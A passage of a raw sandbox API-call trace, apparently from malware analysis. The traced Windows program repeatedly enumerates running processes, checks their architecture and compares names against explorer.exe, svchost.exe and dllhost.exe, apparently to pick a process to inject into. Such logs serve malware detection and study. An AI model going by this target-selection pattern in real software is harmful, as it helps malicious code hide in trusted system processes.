returned 1 [0248.286] CloseHandle (hObject=0xd8) returned 1 [0248.286] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0248.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0248.287] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.287] CloseHandle (hObject=0xd8) returned 1 [0248.287] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0248.287] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0248.288] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0248.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0248.288] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0248.289] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0248.289] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0248.290] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.290] CloseHandle (hObject=0xd8) returned 1 [0248.290] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0248.290] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0248.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0248.290] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.291] CloseHandle (hObject=0xd8) returned 1 [0248.291] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0248.291] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0248.291] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0248.291] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0248.291] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0248.292] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.292] CloseHandle (hObject=0xd8) returned 1 [0248.292] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0248.292] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.292] CloseHandle (hObject=0xd8) returned 1 [0248.292] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0248.292] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0248.293] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0248.293] CloseHandle (hObject=0xd8) returned 1 [0248.293] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.293] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0248.294] CloseHandle (hObject=0xd4) returned 1 [0248.294] Sleep (dwMilliseconds=0x3e8) [0249.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0249.298] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0249.299] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0249.299] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0249.300] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0249.300] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0249.301] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0249.301] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0249.302] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0249.302] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0249.303] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0249.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0249.303] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0249.304] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0249.304] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0249.305] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0249.305] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0249.306] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0249.306] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0249.307] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0249.307] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0249.308] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.308] CloseHandle (hObject=0xd8) returned 1 [0249.308] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0249.308] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0249.308] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0249.308] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0249.308] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0249.309] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.309] CloseHandle (hObject=0xd8) returned 1 [0249.309] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0249.309] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0249.309] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0249.309] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0249.310] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0249.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0249.310] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0249.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0249.311] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.311] CloseHandle (hObject=0xd8) returned 1 [0249.311] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0249.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0249.311] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.311] CloseHandle (hObject=0xd8) returned 1 [0249.311] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0249.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0249.312] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.312] CloseHandle (hObject=0xd8) returned 1 [0249.323] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0249.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0249.324] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.324] CloseHandle (hObject=0xd8) returned 1 [0249.324] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0249.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0249.324] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.324] CloseHandle (hObject=0xd8) returned 1 [0249.324] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0249.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0249.325] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.325] CloseHandle (hObject=0xd8) returned 1 [0249.325] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0249.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0249.326] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.326] CloseHandle (hObject=0xd8) returned 1 [0249.326] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0249.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0249.326] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.326] CloseHandle (hObject=0xd8) returned 1 [0249.326] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0249.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0249.327] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.327] CloseHandle (hObject=0xd8) returned 1 [0249.327] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0249.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0249.327] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.327] CloseHandle (hObject=0xd8) returned 1 [0249.327] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0249.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0249.328] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.328] CloseHandle (hObject=0xd8) returned 1 [0249.328] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0249.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0249.328] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.329] CloseHandle (hObject=0xd8) returned 1 [0249.329] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0249.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0249.329] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.329] CloseHandle (hObject=0xd8) returned 1 [0249.329] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0249.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0249.330] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.330] CloseHandle (hObject=0xd8) returned 1 [0249.330] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0249.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0249.330] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0249.330] CloseHandle (hObject=0xd8) returned 1 [0249.330] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0249.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0249.331] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 